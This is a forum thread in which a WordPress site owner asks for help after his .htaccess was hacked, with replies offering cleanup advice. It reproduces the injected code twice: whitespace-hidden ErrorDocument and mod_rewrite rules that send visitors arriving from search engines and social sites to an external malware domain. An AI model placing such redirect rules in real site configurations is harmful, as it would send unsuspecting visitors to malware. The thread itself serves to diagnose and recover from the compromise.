1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Hacked .htaccess file on wordpress blog

Discussion in 'Blogging' started by deancow, Oct 29, 2011.

  1. deancow

    deancow Power Member

    Joined:
    Jul 8, 2009
    Messages:
    653
    Likes Received:
    235
    hi
    Has anyone come across this before.
    I have a VPS with hostwind and I suddently noticed when clicking on a search result of one of my sites on google I was redirected to a malware site, It turns out my .htaccess file has been modified to redirect google traffic to a 3rd party malware site.
    I have uploaded the old correct .htaccess files and just a few hours later they were reverted back to the ones with malicious code.
    I have set read only permissions on the .htaccess file to no avail.
    Reset the root password
    Reset the account password (ftp and account)
    Deleted any 3rd party plugins

    It looks like their is some malicious plugin or theme being used to modify the .htaccess file, is there any way to find out which one it is as I have over 30 domains on this account.

    thanks
     
  2. deancow

    deancow Power Member

    Joined:
    Jul 8, 2009
    Messages:
    653
    Likes Received:
    235
    This is the code being added, it's inserted 100 lines below my normal .htaccess code and indented so it's not easily found (you might have to scroll right to see it)

    PHP:
                                                                                                                            ErrorDocument 400 http://billing-white.ru/cname/index.php                                                                                                                        
                                                                                                                            
    ErrorDocument 401 http://billing-white.ru/cname/index.php                                                                                                                        
                                                                                                                            
    ErrorDocument 403 http://billing-white.ru/cname/index.php                                                                                                                        
                                                                                                                            
    ErrorDocument 404 http://billing-white.ru/cname/index.php                                                                                                                        
                                                                                                                            
    ErrorDocument 500 http://billing-white.ru/cname/index.php                                                                                                                        
                                                                                                                            
    <IfModule mod_rewrite.c>                                                                                                                        
                                                                                                                            
    RewriteEngine On                                                                                                                        
                                                                                                                            RewriteCond 
    %{HTTP_REFERER} .*google\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*ask\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*yahoo\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*baidu\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*youtube\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*wikipedia\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*qq\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*excite\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*altavista\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*msn\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*netscape\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*aol\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*hotbot\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*goto\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*infoseek\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*mamma\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*alltheweb\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*lycos\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*search\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*metacrawler\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*bing\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*dogpile\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*facebook\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*twitter\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*blog\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*live\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*myspace\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*mail\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*yandex\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*rambler\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*ya\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*aport\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*linkedin\.(.*) [OR]                                                                                                                        
                                                                                                                            
    RewriteCond %{HTTP_REFERER} .*flickr\.(.*)                                                                                                                        
                                                                                                                            
    RewriteRule ^(.*)$ http://billing-white.ru/cname/index.php [R=301,L]                                                                                                                        
                                                                                                                            
    </IfModule>                                                                                                                        
                                                                                                                                                                                                                                                    
     
  3. smrank

    smrank Newbie

    Joined:
    Aug 22, 2009
    Messages:
    16
    Likes Received:
    0
    I can't see the code
     
  4. deancow

    deancow Power Member

    Joined:
    Jul 8, 2009
    Messages:
    653
    Likes Received:
    235
    this should work
    PHP:

    http
    ://billing-white.ru/cname/index.php
    ErrorDocument 401 http://billing-white.ru/cname/index.php
    ErrorDocument 403 http://billing-white.ru/cname/index.php
    ErrorDocument 404 http://billing-white.ru/cname/index.php
    ErrorDocument 500 http://billing-white.ru/cname/index.php
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond 
    %{HTTP_REFERER} .*google\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*ask\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*yahoo\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*baidu\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*youtube\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*wikipedia\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*qq\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*excite\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*altavista\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*msn\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*netscape\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*aol\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*hotbot\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*goto\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*infoseek\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*mamma\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*alltheweb\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*lycos\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*search\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*metacrawler\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*bing\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*dogpile\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*facebook\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*twitter\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*blog\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*live\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*myspace\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*mail\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*yandex\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*rambler\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*ya\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*aport\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*linkedin\.(.*) [OR]
    RewriteCond %{HTTP_REFERER} .*flickr\.(.*)
    RewriteRule ^(.*)$ http://billing-white.ru/cname/index.php [R=301,L]
    </IfModule>
        
     
  5. shiningeyes

    shiningeyes BANNED BANNED

    Joined:
    Feb 7, 2011
    Messages:
    415
    Likes Received:
    297
    smrank scroll to the right...
     
  6. keinehabe

    keinehabe Supreme Member

    Joined:
    Nov 4, 2008
    Messages:
    1,207
    Likes Received:
    472
    Gender:
    Male
    Occupation:
    -= CEO =-
    Location:
    Heaven
    Home Page:
    hosting box is compromised , my best bet is to go to reinstall os on this box , change the password(s) then put back your sites :)

    ps. funny thing , like couple of months ago I was looking about similar code :)
     
  7. account77

    account77 Registered Member

    Joined:
    Apr 3, 2009
    Messages:
    92
    Likes Received:
    91
    Location:
    127.0.0.1
    Same happening with my sites, I'm using justhost shared hosting :-s
     
  8. inboxfull

    inboxfull Registered Member

    Joined:
    Aug 23, 2009
    Messages:
    84
    Likes Received:
    48
    Occupation:
    Oil & Gas
    Location:
    Brunei
    Home Page:
    Try ask help from your hosting. Perhaps it could sort it out..
     
  9. natorob

    natorob Junior Member

    Joined:
    Jul 7, 2011
    Messages:
    189
    Likes Received:
    63
    Occupation:
    Job?!?!?
    Location:
    Denver CO
    Home Page:
    I had a similar problem a couple of months ago with a JustHost shared account as well.

    Call CS at JustHost; they're fast, and actually helpful. They'll show you what to do.

    And you should also check to see if Google has flagged your sites as well... That can be a pain to get them unflagged.
     
  10. deancow

    deancow Power Member

    Joined:
    Jul 8, 2009
    Messages:
    653
    Likes Received:
    235
    Thanks for the suggestions, currently waiting for my host to respond.
    Currently google hasn't flagged any sites as malware but I might suspend the site's hosting for the time being, got to be better than being flagged as malware right?
     
  11. ADHD-Dude

    ADHD-Dude Power Member

    Joined:
    Apr 17, 2010
    Messages:
    592
    Likes Received:
    119
    Look for any file that shouldn't be on the server, the htaccess got modified using a plugin exploit and the hacker uploaded a script to take control of the site.
     
  12. deancow

    deancow Power Member

    Joined:
    Jul 8, 2009
    Messages:
    653
    Likes Received:
    235
    thanks, I have a sneaking suspicion it was caused by a plugin which I used to delete a load of old posts, called something like wp mass delete.
    I have removed it from all my wordpress sites so will have to wait and see if it comes back.
     
  13. gapster

    gapster Registered Member

    Joined:
    Aug 6, 2010
    Messages:
    61
    Likes Received:
    32
    Occupation:
    IM full time
    Location:
    USA NW
    Had similar hack on different host early Sept, and ADHD-Dude is correct, except in my case, hack was controlled by remote commercial hack package.

    In my case, hacker gained access through [uploads] and [images] folders and crawled nearly two dozen sites on my shared box.

    First: "Locked" all suspicious files with 000 permissions (needed to stop re-exploit)

    Second: Deleted and replaced all above. (footprints were non-showing images and extra js files)

    Third: Mine was related to "thumbs exploit" mentioned several moths ago here at BHW. Replaced offending plugin.

    Fourth: They use the above exploit to do the same redirect code and the same "down-page shifted-to-right" mods that you included above. G'gle "Black Hole Exploit" to read more about potential severity of hack. (pretty nasty commercial software that you are fighting against. Do not take this one lightly IMHO)

    Fifth: I added BulletProof Security Pluggin and LimitLoginAttempts and have been hack free for two months (hoping for three...)

    Good luck, hope this helps or re-enforces your plans.
     
  14. Manny

    Manny Registered Member

    Joined:
    Jun 1, 2008
    Messages:
    97
    Likes Received:
    7
    Yep most of these "hacks" are from exploiting bad PHP scripts. Always check a script for security exploits by doing a google search to see if others are getting exploited or have in the past. Unless you're familiar with PHP, that's the best you can do to safeguard against that. Also wouldn't hurt to understand file permissions of the scripts you're using.
     
  15. jamesmorison

    jamesmorison Newbie

    Joined:
    Nov 7, 2011
    Messages:
    23
    Likes Received:
    2
    I was wondering if google can ban a site for redirecting to malware sites?
     
  16. Greybeard

    Greybeard Junior Member

    Joined:
    Aug 27, 2011
    Messages:
    185
    Likes Received:
    18
    This is quite scary! Deancow, how could you tell the .htaccess file was compromised?

    I'm using WPSecurity and Block Bad Queries as my security plug-ins. Is this sufficient or do I need more?